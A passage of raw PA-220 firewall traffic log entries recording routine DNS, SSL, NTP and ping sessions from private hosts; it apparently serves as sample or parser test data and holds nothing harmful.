16:09:19,8,computer-and-internet-info,0,32091155,0x0,192.168.0.0-192.168.255.255,United States,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,untrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24198,1,33769,53,16044,53,0x400019,udp,allow,266,84,182,2,2018/11/30 16:09:12,0,any,0,32091156,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24184,1,14106,53,56614,53,0x400019,udp,allow,164,74,90,2,2018/11/30 16:09:12,0,any,0,32091157,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,untrust,trust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24314,1,52503,443,53168,443,0x400053,tcp,allow,9400,2731,6669,30,2018/11/30 16:09:21,6,business-and-economy,0,32091158,0x0,192.168.0.0-192.168.255.255,United States,0,17,13,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,xtrust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24204,1,52459,443,28012,443,0x40001c,tcp,allow,1761,1100,661,15,2018/11/30 16:09:14,13,computer-and-internet-info,0,32091159,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:45 PA-220 1,2018/11/30 16:09:45,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:45,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,xuntrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:45,24234,1,52483,443,16050,443,0x400053,tcp,allow,14732,3596,11136,31,2018/11/30 16:09:19,8,computer-and-internet-info,0,32091160,0x0,192.168.0.0-192.168.255.255,Asia Pacific Region,0,15,16,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,,,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24390,6,0,0,0,0,0x500019,icmp,allow,1176,588,588,12,2018/11/30 16:09:31,0,any,0,32091161,0x0,192.168.0.0-192.168.255.255,United States,0,6,6,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24093,1,38663,53,61722,53,0x400019,udp,allow,228,84,144,2,2018/11/30 16:09:13,0,any,0,32091162,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24117,1,50443,53,14247,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091163,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24142,1,54215,53,33580,53,0x400019,udp,allow,337,131,206,2,2018/11/30 16:09:13,0,any,0,32091164,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24195,1,35827,53,13498,53,0x400019,udp,allow,252,83,169,2,2018/11/30 16:09:13,0,any,0,32091165,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24124,1,60609,53,20365,53,0x400019,udp,allow,232,100,132,2,2018/11/30 16:09:13,0,any,0,32091166,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24153,1,3248,53,61464,53,0x400019,udp,allow,206,79,127,2,2018/11/30 16:09:13,0,any,0,32091167,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24122,1,49284,53,42877,53,0x400019,udp,allow,194,89,105,2,2018/11/30 16:09:13,0,any,0,32091168,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24171,1,57732,53,5918,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:13,0,any,0,32091169,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24069,1,49195,53,28944,53,0x400019,udp,allow,212,78,134,2,2018/11/30 16:09:13,0,any,0,32091170,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24282,1,17266,53,13415,53,0x400019,udp,allow,252,73,179,2,2018/11/30 16:09:13,0,any,0,32091171,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24218,1,48631,53,2489,53,0x400019,udp,allow,308,90,218,2,2018/11/30 16:09:13,0,any,0,32091172,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24200,1,58540,53,49328,53,0x400019,udp,allow,249,77,172,2,2018/11/30 16:09:13,0,any,0,32091173,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:46 PA-220 1,2018/11/30 16:09:46,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:46,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:46,24224,1,42678,53,36036,53,0x400019,udp,allow,379,74,305,2,2018/11/30 16:09:13,0,any,0,32091174,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24240,1,16576,53,33744,53,0x400019,udp,allow,603,76,527,2,2018/11/30 16:09:14,0,any,0,32091175,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24183,1,39830,53,45809,53,0x400019,udp,allow,242,89,153,2,2018/11/30 16:09:14,0,any,0,32091176,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24211,1,6185,53,3675,53,0x400019,udp,allow,240,71,169,2,2018/11/30 16:09:14,0,any,0,32091177,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24253,1,8781,53,5787,53,0x400019,udp,allow,208,80,128,2,2018/11/30 16:09:14,0,any,0,32091178,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24221,1,16788,53,12342,53,0x400019,udp,allow,253,72,181,2,2018/11/30 16:09:14,0,any,0,32091179,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24310,1,45307,53,18729,53,0x400019,udp,allow,197,76,121,2,2018/11/30 16:09:14,0,any,0,32091180,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ocsp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24326,1,52520,80,57858,80,0x400053,tcp,allow,1927,681,1246,11,2018/11/30 16:09:29,0,computer-and-internet-info,0,32091181,0x0,192.168.0.0-192.168.255.255,United States,0,6,5,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24201,1,8503,53,2722,53,0x400019,udp,allow,394,79,315,2,2018/11/30 16:09:13,1,any,0,32091182,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24130,1,6910,53,6674,53,0x400019,udp,allow,212,82,130,2,2018/11/30 16:09:14,0,any,0,32091183,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24237,1,52475,443,37427,443,0x40001c,tcp,allow,642,354,288,9,2018/11/30 16:09:17,12,any,0,32091184,0x0,192.168.0.0-192.168.255.255,United States,0,5,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:47 PA-220 1,2018/11/30 16:09:47,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:47,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:47,24108,1,14342,53,22408,53,0x400019,udp,allow,225,76,149,2,2018/11/30 16:09:14,0,any,0,32091185,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24247,1,48197,53,27899,53,0x400019,udp,allow,273,71,202,2,2018/11/30 16:09:15,0,any,0,32091186,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24098,1,32296,53,52939,53,0x400019,udp,allow,270,75,195,2,2018/11/30 16:09:15,0,any,0,32091187,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:48 PA-220 1,2018/11/30 16:09:48,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:48,192.168.15.195,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ntp,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:48,24263,1,33870,123,42907,123,0x400053,udp,allow,180,90,90,2,2018/11/30 16:09:15,0,any,0,32091188,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.196,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24258,1,54659,53,19658,53,0x400019,udp,drop ICMP,340,148,192,4,2018/11/30 16:09:16,0,any,0,32091189,0x0,192.168.0.0-192.168.255.255,United States,0,2,2,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24155,1,57446,53,64352,53,0x400019,udp,reset client,291,83,208,2,2018/11/30 16:09:16,0,any,0,32091190,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24232,1,22655,53,60126,53,0x400019,udp,reset server,184,84,100,2,2018/11/30 16:09:16,0,any,0,32091191,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24330,1,52509,443,59771,443,0x40001a,tcp,reset both,9290,2053,7237,24,2018/11/30 16:09:21,10,business-and-economy,0,32091192,0x0,192.168.0.0-192.168.255.255,United States,0,13,11,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,23960,1,27192,53,35748,53,0x400019,udp,allow,202,93,109,2,2018/11/30 16:09:16,0,any,0,32091193,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24236,1,30221,53,63701,53,0x400019,udp,allow,200,84,116,2,2018/11/30 16:09:16,0,any,0,32091194,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:49 PA-220 1,2018/11/30 16:09:49,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:49,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:49,24276,1,30570,53,57872,53,0x400019,udp,allow,160,64,96,2,2018/11/30 16:09:16,0,any,0,32091195,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24299,1,52497,443,37581,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091196,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24229,1,52498,443,19226,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091197,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24283,1,52496,443,61721,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091198,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24369,1,52510,443,10098,443,0x40001a,tcp,allow,10511,2691,7820,22,2018/11/30 16:09:21,11,web-advertisements,0,32091199,0x0,192.168.0.0-192.168.255.255,United States,0,12,10,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ssl,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24354,1,52495,443,4564,443,0x40001c,tcp,allow,1754,1100,654,15,2018/11/30 16:09:21,11,business-and-economy,0,32091200,0x0,192.168.0.0-192.168.255.255,United States,0,8,7,tcp-rst-from-client,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24254,1,52486,443,32104,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091201,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24246,1,52489,443,14172,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091202,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24343,1,52490,443,10286,443,0x40001c,tcp,allow,490,276,214,7,2018/11/30 16:09:20,12,any,0,32091203,0x0,192.168.0.0-192.168.255.255,United States,0,4,3,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:50 PA-220 1,2018/11/30 16:09:50,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:50,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,incomplete,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:50,24262,1,52493,443,30799,443,0x40001c,tcp,allow,556,276,280,8,2018/11/30 16:09:20,12,any,0,32091204,0x0,192.168.0.0-192.168.255.255,United States,0,4,4,tcp-fin,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:51 PA-220 1,2018/11/30 16:09:51,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:51,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,dns,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 16:09:51,24281,1,59320,53,13490,53,0x400019,udp,allow,269,97,172,2,2018/11/30 16:09:18,0,any,0,32091205,0x0,192.168.0.0-192.168.255.255,United States,0,1,1,aged-out,0,0,0,0,,PA-220,from-policy,,,0,,0,,N/A,0,0,0,0 +Nov 30 16:09:52 PA-220 1,2018/11/30 16:09:52,012801096514,TRAFFIC,end,2049,2018/11/30 16:09:52,192.168.15.224,175.16.199.1,192.168.1.63,175.16.199.1,new_outbound_from_trust,,,ping,vsys1,trust,untrust,ethernet1/2,ethernet1/1,send_to_mac,2018/11/30 